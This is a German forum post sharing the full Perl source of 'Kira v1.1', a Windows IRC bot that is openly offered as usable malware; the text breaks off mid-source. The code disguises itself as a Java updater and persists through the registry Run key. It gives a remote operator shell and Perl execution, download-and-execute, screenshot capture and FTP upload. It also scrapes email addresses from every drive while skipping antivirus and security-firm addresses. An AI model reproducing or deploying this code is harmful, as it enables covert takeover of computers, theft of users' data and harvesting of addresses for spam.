[+]Topic: Code
[+]Von: Rayden
[+]Return: Code

Perl Win32 Kira v1.1 - IRC Bot

[Funktionen/Befehle]

# -cmd [BEFEHL]	= CMD Kommandos ausführen
# -exist "[PFAD]" = Auf die Existenz eines Pfades prüfen
# -ftpdownexec "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" "[FTPDATEI]" "[ZIELDATEI]" "[PARAMETER]"	= Datei via FTP herunterladen und ausführen
# -ftpdownload "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" "[FTPDATEI]" "[ZIELDATEI]" = Datei via FTP herunterladen
# -ftpgetmails "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]"	= E-Mail Adressen sammeln und auf einen FTP Server hochladen
# -ftpgetmoremails "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" = E-Mail Adressen sammeln (erkennt zB. auch user[AT]host[d0t]de) und auf einen FTP Server hochladen
# -ftpupdate "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" "[FTPDATEI]" "[ZIELDATEI]" "[PARAMETER]" = Update via FTP durchführen
# -ftpupload "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" "[DATEI]" = Datei via FTP hochladen
# -ftpscreen "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" = Screenshot via FTP hochladen (Danke an Perforin)
# -localtime = Datum und Uhrzeit anzeigen
# -perl [BEFEHL] = Perl Kommandos ausführen
# -process = Prozesse auflisten
# -os = Betriebssystem anzeigen
# -pubscanstart	= Nach Pub-FTPs scannen
# -pubscanstop = FTP-Pubscan stoppen
# -say [CHANNEL|USER] "[TEXT]" = Eine Nachricht in den Channel oder an einen User schicken
# -uptime = Uptime anzeigen
# -version = Version anzeigen
# -webdownexec "[URL]" "[ZIELDATEI]" "[PARAMETER]" = Datei herunterladen und ausführen
# -webdownload "[URL]" "[ZIELDATEI]" = Datei herunterladen
# -webupdate "[URL]" "[ZIELDATEI]" "[PARAMETER]" = Update durchführen

######################## # Perl Win32 Kira v1.1 # # (c) by Rayden # ######################## # http://vxnetw0rk.ws # # http://bi0tic.info # ######################## # # Thx to: # - Perforin (Für seine "Datum und Zeit-", "Doppelte E-Mails löschen-", und "Screencapture" Codes, seine Sourcecodes und Tutorials) # - ShaQ (Für seinen Passwort-Generator, seine Sourcecodes und Tutorials) # # Greetz to: # - All VXnetw0rk Members # - All bi0tic Members # ##################################################################################################################################################################################################################### # Funktionen/Befehle # ##################################################################################################################################################################################################################### # -cmd [BEFEHL] = CMD Kommandos ausführen # -exist "[PFAD]" = Auf die Existenz eines Pfades prüfen # -ftpdownexec "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" "[FTPDATEI]" "[ZIELDATEI]" "[PARAMETER]" = Datei via FTP herunterladen und ausführen # -ftpdownload "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" "[FTPDATEI]" "[ZIELDATEI]" = Datei via FTP herunterladen # -ftpgetmails "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" = E-Mail Adressen sammeln und auf einen FTP Server hochladen # -ftpgetmoremails "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" = E-Mail Adressen sammeln (erkennt zB. auch user[AT]host[d0t]de) und auf einen FTP Server hochladen # -ftpupdate "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" "[FTPDATEI]" "[ZIELDATEI]" "[PARAMETER]" = Update via FTP durchführen # -ftpupload "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" "[DATEI]" = Datei via FTP hochladen # -ftpscreen "[FTP HOST]" "[FTP PORT]" "[FTP NAME]" "[FTP PASSWORT]" = Screenshot via FTP hochladen (Danke an Perforin) # -localtime = Datum und Uhrzeit anzeigen # -perl [BEFEHL] = Perl Kommandos ausführen # -process = Prozesse auflisten # -os = Betriebssystem anzeigen # -pubscanstart = Nach Pub-FTPs scannen # -pubscanstop = FTP-Pubscan stoppen # -say [CHANNEL|USER] "[TEXT]" = Eine Nachricht in den Channel oder an einen User schicken # -uptime = Uptime anzeigen # -version = Version anzeigen # -webdownexec "[URL]" "[ZIELDATEI]" "[PARAMETER]" = Datei herunterladen und ausführen # -webdownload "[URL]" "[ZIELDATEI]" = Datei herunterladen # -webupdate "[URL]" "[ZIELDATEI]" "[PARAMETER]" = Update durchführen ##################################################################################################################################################################################################################### # Kira v1.1 Sourcecode # ##################################################################################################################################################################################################################### use Archive::Zip; use Digest::MD5("md5_hex"); use File::Basename; use File::Copy; use File::Find; use File::Path; use IO::Socket; use MIME::Base64; use LWP::Simple; use threads; use threads::shared; use Win32; use Win32::Capture; use Win32::File; use Win32::Mutex; use Win32::Process; use Win32::Process::list; use Win32::Registry; $version = "1.1"; $mutex = "..::<Kira_v1.1>::.."; $appdata = $ENV{"appdata"}; $systemroot = $ENV{"systemroot"}; $username = $ENV{"username"}; $para = "/update"; $pfad = "$appdata\\Java\\jre6\\bin"; $file = "jusched.exe"; $regpfad = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; $regname = "SunJavaUpdateSched"; $recips = "java.dll"; $batfile = "jnet.bat"; $pubfile = "jserv.dll"; $name = "Kira"; ############################## # Passwort Generator by ShaQ # ############################## @nummzeichen = ('a'..'z','0'..'9'); $nummmax = int(rand(16)+1); for(1..$nummmax) { $numm.= @nummzeichen[int(rand@nummzeichen)]; } $nick = "$name$numm"; $irchost = "127.0.0.1"; $ircport = "6667"; $chan = "#kira"; $ircpass = "Kira_v1.1"; $loginpass = "0c9382cdd7d583e2bbd313a475b6d243"; $ftpgetmails = "false"; $pubscan = "false"; share $chan; share $channr; share $ftpgetmails; share $pubscan; mkpath ("$pfad"); chdir ("$pfad"); Win32::File::SetAttributes("$0", NORMAL); copy ("$0", "$pfad\\$file"); $HKEY_CURRENT_USER->Create($regpfad,$registry); $registry->SetValueEx("$regname",$reserviert,REG_SZ,"\"$pfad\\$file\" $para"); $registry->Close(); if (($ARGV[0]) ne ($para)) { Win32::Mutex::open($mutexobj, $mutex) && exit; Win32::Process::Create($pinstall, "$file", "\"$pfad\\$file\" $para", "0", "DETACHED_PROCESS", "."); exit; } Win32::Mutex::open($mutexobj, $mutex) && exit; Win32::Mutex::Create($mutexobj, 0, $mutex); ircthread(); sub ircthread { while (1) { $httpsock = new IO::Socket::INET (PeerAddr => "google.com", PeerPort => "80", Proto => "tcp"); if (not defined ($httpsock)) { sleep (1); } else { print $httpsock "GET / HTTP/1.1\r\n"; print $httpsock "Host: google.com\r\n"; print $httpsock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13\r\n"; print $httpsock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; print $httpsock "Connection: close\r\n"; print $httpsock "\r\n\r\n"; close ($httpsock); $ircsock = new IO::Socket::INET ( PeerAddr => "$irchost", PeerPort => "$ircport", Proto => "tcp"); if (not defined ($ircsock)) { if ($irchost !~ m/(\d+)\.(\d+)\.(\d+)\.(\d+)/) { undef $irchostipbin; $irchostipbin = gethostbyname($irchost); if (defined ($irchostipbin)) { $irchost = inet_ntoa($irchostipbin); } } if ($irchost =~ m/(\d+)\.(\d+)\.(\d+)\.(\d+)/) { $irca = "$1"; $ircb = "$2"; $ircc = "$3"; $ircd = "$4"; $ircd = $ircd + 1; if ($ircd == 256) { $ircd = 0; $ircc = $ircc + 1; } if ($ircc == 256) { $ircc = 0; $ircb = $ircb + 1; } if ($ircb == 256) { $ircb = 0; $irca = $irca + 1; } if ($irca == 256) { $irca = 0; $ircb = 0; $ircc = 0; $ircd = 0; } $irchost = "$irca.$ircb.$ircc.$ircd"; $ircport = "6667"; } else { $irca = int(rand(256)); $ircb = int(rand(256)); $ircc = int(rand(256)); $ircd = int(rand(256)); $irchost = "$irca.$ircb.$ircc.$ircd"; $ircport = "6667"; } } else { print $ircsock "NICK $nick\r\n"; print $ircsock "USER $nick 8 * :$nick\r\n"; while ($ircinput = <$ircsock>) { if ($ircinput =~ m/^PING (.*?)$/gi) { print $ircsock "PONG ".$1."\n"; } if ($ircinput =~ m/^:(.*?) (376|422)/) { $ircserver = "$1"; last; } if ($ircinput =~ m/^:(.*?) (432)/) { undef $numm; $name = "Kira"; @nummzeichen = ('a'..'z','0'..'9'); for(1..4) { $numm.= @nummzeichen[int(rand@nummzeichen)]; } $nick = "$name$numm"; print $ircsock "NICK $nick\r\n"; } if ($ircinput =~ m/^:(.*?) (433)/) { undef $numm; $name = "Kira"; @nummzeichen = ('a'..'z','0'..'9'); $nummmax = int(rand(16)+1); for(1..$nummmax) { $numm.= @nummzeichen[int(rand@nummzeichen)]; } $nick = "$name$numm"; print $ircsock "NICK $nick\r\n"; } } print $ircsock "MODE $nick +iwx\r\n"; print $ircsock "JOIN $chan$channr $ircpass\r\n"; $antwort = "$chan$channr"; while ($ircinput = <$ircsock>) { if ($ircinput =~ m/^PING (.*?)$/gi) { print $ircsock "PONG ".$1."\n"; } if ($ircinput =~ m/^:(.*)!(.*) PRIVMSG (#.*|$nick) :(-login) (.*)./) { if (($master) eq (undef)) { chomp(($loginline) = ($5)); $login = md5_hex($loginline); if (($login) eq ($loginpass)) { $master = "$1!$2"; $masternick = "$1"; $masterhost = "$2"; if ($3 =~ m/^#/) { $antwort = "$chan$channr"; } else { $antwort = "$masternick"; } print $ircsock "PRIVMSG $antwort :Hi $masternick :)\r\n"; } } } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-cmd) (.*)./) { chomp(($batline) = ($4)); open (BATFILE,">","$batfile"); print BATFILE "$batline"; close (BATFILE); Win32::Process::Create($pcmd, "$batfile", "$batfile", "0", "DETACHED_PROCESS | CREATE_NO_WINDOW", "."); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-exist) \"(.*)\"./) { chomp(($existfile) = ($4)); if ($2 =~ m/^#/) { $antwort = "$chan$channr"; } else { $antwort = "$masternick"; } if (-e "$existfile") { print $ircsock "PRIVMSG $antwort :$existfile = Existiert\r\n"; } else { print $ircsock "PRIVMSG $antwort :$existfile = Existiert nicht!\r\n"; } } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-ftpdownexec) \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\"./) { chomp(($befehl,$ftphost,$ftpport,$ftpname,$ftppass,$ftpfile,$dlfile,$dlpara) = ($3,$4,$5,$6,$7,$8,$9,$10)); $uploadftpthread = threads->create(\&ftpdownloadthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-ftpdownload) \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\"./) { chomp(($befehl,$ftphost,$ftpport,$ftpname,$ftppass,$ftpfile,$dlfile) = ($3,$4,$5,$6,$7,$8,$9)); $uploadftpthread = threads->create(\&ftpdownloadthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-ftpgetmails) \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\"./) { if (($ftpgetmails) eq (false)) { $ftpgetmails = "true"; chomp(($befehl,$ftphost,$ftpport,$ftpname,$ftppass) = ($3,$4,$5,$6,$7)); $ftpgetmailsthread = threads->create(\&ftpgetmailsthread); } } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-ftpgetmoremails) \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\"./) { if (($ftpgetmails) eq (false)) { $ftpgetmails = "true"; chomp(($befehl,$ftphost,$ftpport,$ftpname,$ftppass) = ($3,$4,$5,$6,$7)); $ftpgetmailsthread = threads->create(\&ftpgetmailsthread); } } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-ftpupdate) \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\"./) { chomp(($befehl,$ftphost,$ftpport,$ftpname,$ftppass,$ftpfile,$dlfile,$dlpara) = ($3,$4,$5,$6,$7,$8,$9,$10)); $uploadftpthread = threads->create(\&ftpdownloadthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-ftpupload) \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\"./) { chomp(($befehl,$ftphost,$ftpport,$ftpname,$ftppass,$uploadfile) = ($3,$4,$5,$6,$7,$8)); $uploadftpthread = threads->create(\&ftpuploadthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-ftpscreen) \"(.*)\" \"(.*)\" \"(.*)\" \"(.*)\"./) { chomp(($befehl,$ftphost,$ftpport,$ftpname,$ftppass) = ($3,$4,$5,$6,$7)); $ftpscreenthread = threads->create(\&ftpscreenthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-localtime)./) { if ($2 =~ m/^#/) { $antwort = "$chan$channr"; } else { $antwort = "$masternick"; } ############################## # Datum und Zeit by Perforin # ############################## ($sekunde, $minute, $stunde, $tag, $monat, $jahroffset, $dayOfWeek, $dayOfYear, $daylightSavings) = localtime(); $jahr = 1900 + $jahroffset; $monat = $monat + 1; if ($monat <= 9) { $monat = "0$monat"; } if ($tag <= 9) { $tag = "0$tag"; } if ($stunde <= 9) { $stunde = "0$stunde"; } if ($minute <= 9) { $minute = "0$minute"; } if ($sekunde <= 9) { $sekunde = "0$sekunde"; } print $ircsock "PRIVMSG $antwort :Localtime\: $tag.$monat.$jahr $stunde\:$minute\r\n"; } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-perl) (.*)./) { chomp(($perlline) = ($4)); $perlthread = threads->create(\&perlthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-process)./) { if ($2 =~ m/^#/) { $antwort = "$chan$channr"; } else { $antwort = "$masternick"; } $process = Win32::Process::List->new(); @prozessliste = $process->GetProcesses(); print $ircsock "PRIVMSG $antwort :@prozessliste\r\n"; } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-os)./) { if ($2 =~ m/^#/) { $antwort = "$chan$channr"; } else { $antwort = "$masternick"; } @osname = Win32::GetOSName(); $osbit = Win32::GetArchName(); print $ircsock "PRIVMSG $antwort :OS\: @osname $osbit\r\n"; } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-pubscanstart)./) { if (($pubscan) eq (false)) { $pubscan = "true"; $pubscanthread = threads->create(\&pubscanthread); } } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-pubscanstop)./) { if (($pubscan) eq (true)) { $pubscan = "false"; } } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-say) (.*) \"(.*)\"./) { chomp(($befehl,$empfang,$text) = ($3,$4,$5)); print $ircsock "PRIVMSG $empfang $text\r\n" } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-uptime)./) { if ($2 =~ m/^#/) { $antwort = "$chan$channr"; } else { $antwort = "$masternick"; } $tickcount = Win32::GetTickCount(); $tage = int($time/86400000); $stunden = int(($tickcount = ($tickcount-$tage*86400000))/3600000); $minuten = int(($tickcount = ($tickcount-$stunden*3600000))/60000); print $ircsock "PRIVMSG $antwort :Uptime\: $tage Tage, $stunden Stunden, $minuten Minuten\r\n"; } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-version)./) { if ($2 =~ m/^#/) { $antwort = "$chan$channr"; } else { $antwort = "$masternick"; } print $ircsock "PRIVMSG $antwort :Kira v$version\r\n"; } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-webdownexec) \"(.*)\" \"(.*)\" \"(.*)\"./) { chomp(($befehl,$dlurl,$dlfile,$dlpara) = ($3,$4,$5,$6)); $downloadhread = threads->create(\&webdownloadthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-webdownload) \"(.*)\" \"(.*)\"./) { chomp(($befehl,$dlurl,$dlfile) = ($3,$4,$5)); $downloadthread = threads->create(\&webdownloadthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-webupdate) \"(.*)\" \"(.*)\" \"(.*)\"./) { chomp(($befehl,$dlurl,$dlfile,$dlpara) = ($3,$4,$5,$6)); $downloadhread = threads->create(\&webdownloadthread); } if ($ircinput =~ m/^:($master) PRIVMSG (#.*|$nick) :(-logout)./) { undef $master; } if ($ircinput =~ m/^:($master) QUIT :Quit: (-logout)/) { undef $master; } if ($ircinput =~ m/^:(.*)!(.*) KICK (#.*) $nick/) { print $ircsock "JOIN $chan$channr $ircpass\r\n"; } if ($ircinput =~ m/^:($ircserver) (404|471|473|474|475|477|485)/) { $channr = $channr + 1; print $ircsock "JOIN $chan$channr $ircpass\r\n"; } if ($ircinput =~ m/^:($ircserver) (366)/) { print $ircsock "MODE $chan$channr +nst\r\n"; print $ircsock "MODE $chan$channr +k $ircpass\r\n"; } } } } } } sub ftpgetmailsthread { if (($befehl) eq (-ftpgetmoremails)) { $getmailstype = "getmoremailssub"; } else { $getmailstype = "getmailssub"; } @maildrives = ("C:", "D:", "E:", "F:", "G:", "H:", "I:", "J:", "K:", "L:", "M:", "N:", "O:", "P:", "Q:", "R:", "S:", "T:", "U:", "V:", "W:", "X:", "Y:", "Z:"); @mailfiles = ( '\.abc', '\.abu', '\.abw', '\.abx', '\.adb', '\.ade', '\.adp', '\.adr', '\.asa', '\.asp', '\.aspx', '\.bak', '\.cfg', '\.cgi', '\.cls', '\.cntk', '\.con', '\.csp', '\.csv', '\.ctt', '\.dat', '\.dbf', '\.dbx', '\.dhtm', '\.dif', '\.doc', '\.docx', '\.dwt', '\.eml', '\.emlx', '\.fdb', '\.fpt', '\.hta', '\.htc', '\.htm', '\.html', '\.imh', '\.imm', '\.inb', '\.inbox', '\.ini', '\.jsp', '\.jst', '\.log', '\.ldb', '\.ldf', '\.ldif', '\.list', '\.lst', '\.mab', '\.mail', '\.mbx', '\.mbox', '\.mda', '\.mdb', '\.mde', '\.mdw', '\.mdx', '\.mht', '\.mhtm', '\.mhtml', '\.mmf', '\.mml', '\.msf', '\.msg', '\.nab', '\.nch', '\.nfo', '\.nsf', '\.nws', '\.odb', '\.odg', '\.odp', '\.ods', '\.odt', '\.oft', '\.ost', '\.pdb', '\.php', '\.phtm', '\.phtml', '\.pl', '\.pmr', '\.pp', '\.pps', '\.ppsx', '\.ppt', '\.pptx', '\.pst', '\.psw', '\.pxl', '\.rdf', '\.rss', '\.rtf', '\.sda', '\.sdc', '\.sdd', '\.sdw', '\.sht', '\.shtm', '\.shtml', '\.slk', '\.sql', '\.ssi', '\.stm', '\.sxc', '\.sxw', '\.tbb', '\.tbi', '\.txt', '\.uin', '\.uop', '\.uos', '\.uot', '\.vbs', '\.vcf', '\.vcs', '\.wab', '\.wml', '\.wsh', '\.xht', '\.xhtml', '\.xls', '\.xlsx', '\.xml', '\.xsd', '\.xsl', '\.xst'); $mailfiles = join ('|', @mailfiles); @blacklist_emails = ( 'abuse', '\@acunetix', 'adware', '\@aladdin', 'antibot', '\@antivir', '\@arcabit', '\@ashampoo', '\@authentium', '\@avast', '\@avg', '\@avira', 'avsubmit', 'badware', 'backdoor', '\@bit9', '\@bitdefender', '\@blackholecomputing'. 'blacklist', 'bothunter', 'botnet', '\@bsi', '\@bugbopper', '\@bullguard', '\@citi.umich.edu', '\@clamav', 'cloud', 'collective', '\@comodo', 'crimeware', 'defend', 'defense', '\@dnsbl', '\@dnsstuff', '\@dronebl', '\@drweb', '\@dshield', '\@emsisoft', '\@eset', '\@ewido', 'example', 'exploit', 'firewall', 'fraud', '\@freeav', '\@free-av', '\@fprot', '\@f-prot', '\@fortinet', '\@gdata', 'greylist', '\@hijackthis', 'hoax', 'honeynet', 'honeypot', 'honeytrap', '\@idefense', '\@ikarus', 'inthewild', '\@iseclab', '\@jotti', '\@kaspersky', 'kerio', '\@lavasoft', 'mailscan', 'malicious', 'malware', '\@mcafee', '\@messagelab', '\@microsoft', '\@mwti', '\@mxlab', '\@nai', '\@nist', '\@norman', '\@norton', '\@pandasecurity', '\@pandasoftware', '\@pestpatrol', 'pharming', 'phishing', '\@prevx', 'protect', '\@quickheal', 'ransomware', 'report', '\@rising', 'riskware', 'rogueware', 'rootkit', 'rubotted', '\@safer-networking', 'sample', '\@sans', 'scan@', 'scareware', '\@secunia', 'secure', 'security', '\@shadowserver', '\@softwin', '\@sophos', 'sorbs', 'spam', '\@spybot', 'spyware', 'surbl', 'suspicious', '\@symantec', 'threat', '\@trendmicro', 'uribl', '\@us.checkpoint', 'trojan', 'virscan', 'virus', 'vishing', 'vulnerabilit', 'websense', 'wildlist', 'worm', '\@zonelabs'); $blacklist_emails = join ('|', @blacklist_emails); @atsign = ( '\@', ' ?\@\@ ?', ' ?\@at\@ ?', ' ?\*\@\* ?', ' ?\(\@\) ?', ' ?\[\@\] ?', ' ?\{\@\} ?', ' ?<\@> ?', ' ?_\@_ ?', ' ?\([_|-|]\@[_|-|]\) ?', ' ?\[[_|-|]\@[_|-|]\] ?', ' ?\{[_|-|]\@[_|-|]\} ?', ' ?\(a\) ?', ' ?\*[a|ä]t\*? ?', ' ?\([a|ä]t\) ?', ' ?\[[a|ä]t\] ?', ' ?\{[a|ä]t\} ?', ' ?<[a|ä]t> ?', ' ?_[a|ä]t_ ?', ' ?\([_|-|][a|ä]t[_|-|]\) ?', ' ?\[[_|-|][a|ä]t[_|-|]\] ?', ' ?\{[_|-|][a|ä]t[_|-|]\} ?', ' ?\*at[ |_|-]?sign\* ?', ' ?\(at[ |_|-]?sign\) ?', ' ?\[at[ |_|-]?sign\] ?', ' ?\{at[ |_|-]?sign\} ?', ' ?<at[ |_|-]?sign> ?', ' ?_at[ |_|-]?sign_ ?', ' ?\(_at[ |_|-]?sign_\) ?', ' ?\[_at[ |_|-]?sign_\] ?', ' ?\{_at[ |_|-]?sign_\} ?', ' ?\(put the \'?at\'?[ |_|-]?sign here\) ?', ' ?\(put the \'?at\'?[ |_|-]?sign here\) ?', ' ?\(put the \'?at\'?[ |_|-]?sign here\) ?', ' ?\(put the \'?at\'?[ |_|-]?sign here\) ?', ' ?\(klammeraffe\) ?', ' ?\[klammeraffe\] ?', ' ?\{klammeraffe\} ?', ' ?<klammeraffe> ?', ' ?_klammeraffe_ ?', ' ?chr\(64\) ?', ' ?&#064 ?', ' ?&#64 ?', ' ?&#64\; ?', ' ?&#x40\; ?', ' ?\\x40 ?'); $atsign = join ('|', @atsign); @dotsign = ('\.', ' ?\.\. ?', ' ?\.d[o|0]t\. ?', ' ?\*\.\* ?', ' ?\(\.\) ?', ' ?\[\.\] ?', ' ?\{\.\} ?', ' ?<\.> ?', ' ?_\._ ?', ' ?\([_|-|]\.[_|-|]\) ?', ' ?\[[_|-|]\.[_|-|]\] ?', ' ?\{[_|-|]\.[_|-|]\} ?', ' ?\(\.\) ?', ' ?\*d[o|0]t\* ?', ' ?\(d[o|0]t\) ?', ' ?\[d[o|0]t\] ?', ' ?\{d[o|0]t\} ?', ' ?<d[o|0]t> ?', ' ?_d[o|0]t_ ?', ' ?\([_|-|]d[o|0]t[_|-|]\) ?', ' ?\[[_|-|]d[o|0]t[_|-|]\] ?', ' ?\{[_|-|]d[o|0]t[_|-|]\} ?', ' ?\*d[o|0]t[ |_|-]?sign\* ?', ' ?\(d[o|0]t[ |_|-]?sign\) ?', ' ?\[d[o|0]t[ |_|-]?sign\] ?', ' ?\{d[o|0]t[ |_|-]?sign\} ?', ' ?<d[o|0]t[ |_|-]?sign> ?', ' ?_d[o|0]t[ |_|-]?sign_ ?', ' ?\(_d[o|0]t[ |_|-]?sign_\) ?', ' ?\[_d[o|0]t[ |_|-]?sign_\] ?', ' ?\{_d[o|0]t[ |_|-]?sign_\} ?', ' ?\(p[o|0]int\) ?', ' ?\[p[o|0]int\] ?', ' ?\{p[o|0]int\} ?', ' ?<p[o|0]int> ?', ' ?_p[o|0]int_ ?', ' ?\(punkt\) ?', ' ?\[punkt\] ?', ' ?\{punkt\} ?', ' ?<punkt> ?', ' ?_punkt_ ?', ' ?chr\(46\) ?', ' ?&#046 ?', ' ?&#46 ?', ' ?&#46\; ?'); $dotsign = join ('|', @dotsign); open (RECIPS,">","$recips"); foreach $maildrives (@maildrives) { chdir ("$maildrives\\"); find(\&$getmailstype,$maildrives); } chdir ("$pfad"); close (RECIPS); ######################################## # Doppelte E-Mails löschen by Perforin # ######################################## open(RECIPSLESEN,"<","$recips"); %hash; for (<RECIPSLESEN>) { $hash{$_} = 1; } close (RECIPSLESEN); unlink ("$recips"); $uploadfile = "$nick\_Emails.txt"; open (RECIPSSCHREIBEN,">","$uploadfile"); @unsortedemails = keys(%hash); @emails = sort(@unsortedemails); print RECIPSSCHREIBEN @emails; close (RECIPSSCHREIBEN); ftpuploadthread(); $ftpgetmails = "false"; threads->exit; } sub getmailssub { $File::Find::name =~ s/\//\\\\/g; if (-f $File::Find::name && $File::Find::name =~ m/($mailfiles)$/i) { open (MFILE,"<","$File::Find::name") || next; while ($zeile = <MFILE>) { foreach ($zeile =~ m/(\w[-.\w]+\@[-.\w]+\.[A-Za-z]{2,4})/ig) { next if $_ =~ m/($blacklist_emails)/i; $email = lc($_); print RECIPS "$email\r\n"; select(undef, undef, undef, 0.001); } } close (MFILE); } } sub getmoremailssub { $File::Find::name =~ s/\//\\\\/g; if (-f $File::Find::name && $File::Find::name =~ m/($mailfiles)$/i) { open (MFILE,"<","$File::Find::name") || next; while ($zeile = <MFILE>) { while ($zeile =~ m/(\w[-.\w]+)($atsign)([-.\w]+)($dotsign)([a-z]{2,4})/ig) { $email = "$1\@$3\.$5"; next if $email =~ m/($blacklist_emails)/i; $email = lc($email); print RECIPS "$email\r\n"; select(undef, undef, undef, 0.001); } } close (MFILE); } } sub ftpdownloadthread { $ftpsock = new IO::Socket::INET(PeerAddr => "$ftphost", PeerPort => "$ftpport", Proto => "tcp"); while ($ftpinput = <$ftpsock>) { if ($ftpinput =~ m/^(220) /) { print $ftpsock "USER $ftpname\r\n"; } if ($ftpinput =~ m/^(331) /) { print $ftpsock "PASS $ftppass\r\n"; } if ($ftpinput =~ m/^(230) /) { print $ftpsock "TYPE I\r\n"; } if ($ftpinput =~ m/^(200) /) { print $ftpsock "PASV\r\n"; } if ($ftpinput =~ m/^(227) .* \((\d+,\d+,\d+,\d+),(\d+),(\d+)\)/) { $ftphost2 = "$2"; $ftpport3 = "$3"; $ftpport4 = "$4"; $ftphost2 =~ s/,/\./g; $ftpport2 = $ftpport3 * 256; $ftpport2 = $ftpport2 + $ftpport4; print $ftpsock "RETR $ftpfile\r\n"; } if ($ftpinput =~ m/^(150) /) { $ftpsock2 = new IO::Socket::INET( PeerAddr => "$ftphost2", PeerPort => "$ftpport2", Proto => "tcp"); open (FTPFILE,">","$dlfile"); binmode (FTPFILE); while (<$ftpsock2>) { print FTPFILE "$_"; } close ($ftpsock2); close (FTPFILE); } if ($ftpinput =~ m/^(226) /) { print $ftpsock "QUIT\r\n"; } if ($ftpinput !~ m/^(150|200|220|221|226|227|230|331)/) { print $ftpsock "QUIT\r\n"; } } close ($ftpsock); if (($befehl) eq (-ftpupdate)) { Win32::Process::Create($pdownload, "$dlfile", "\"$pfad\\$dlfile\" $dlpara", "0", "DETACHED_PROCESS", ".") && exit; } if (($befehl) eq (-ftpdownexec)) { Win32::Process::Create($pdownload, "$dlfile", "\"$pfad\\$dlfile\" $dlpara", "0", "DETACHED_PROCESS", "."); } threads->exit; } sub ftpuploadthread { undef $ftprandom; @ftprandomzeichen = ('a'..'z','0'..'9'); for (1..10) { $ftprandom.= @ftprandomzeichen[int(rand@ftprandomzeichen)]; } $ftpfile = "$nick\_$ftprandom.zip"; if ($uploadfile =~ m/.*\\(.*?)$/) { $uploadfileinzip = "$1"; } $makezip = Archive::Zip->new(); $makezip->addFile("$uploadfile","$uploadfileinzip"); foreach $member ($makezip->members()) { $member->desiredCompressionMethod( COMPRESSION_DEFLATED ); $member->desiredCompressionLevel( 9 ); } $makezip->writeToFileNamed("$ftpfile"); $ftpsock = new IO::Socket::INET(PeerAddr => "$ftphost", PeerPort => "$ftpport", Proto => "tcp"); while ($ftpinput = <$ftpsock>) { if ($ftpinput =~ m/^(220) /) { print $ftpsock "USER $ftpname\r\n"; } if ($ftpinput =~ m/^(331) /) { print $ftpsock "PASS $ftppass\r\n"; } if ($ftpinput =~ m/^(230) /) { print $ftpsock "TYPE I\r\n"; } if ($ftpinput =~ m/^(200) /) { print $ftpsock "PASV\r\n"; } if ($ftpinput =~ m/^(227) .* \((\d+,\d+,\d+,\d+),(\d+),(\d+)\)/) { $ftphost2 = "$2"; $ftpport3 = "$3"; $ftpport4 = "$4"; $ftphost2 =~ s/,/\./g; $ftpport2 = $ftpport3 * 256; $ftpport2 = $ftpport2 + $ftpport4; print $ftpsock "STOR $ftpfile\r\n"; } if ($ftpinput =~ m/^(150) /) { $ftpsock2 = new IO::Socket::INET( PeerAddr => "$ftphost2", PeerPort => "$ftpport2", Proto => "tcp"); open (FTPFILE,"<","$ftpfile"); binmode (FTPFILE); while (<FTPFILE>) { print $ftpsock2 "$_"; } close ($ftpsock2); close (FTPFILE); } if ($ftpinput =~ m/^(226) /) { print $ftpsock "QUIT\r\n"; } if ($ftpinput !~ m/^(150|200|220|221|226|227|230|331)/) { print $ftpsock "QUIT\r\n"; } } close ($ftpsock); unlink ($ftpfile); threads->exit; } ############################# # Screencapture by Perforin # 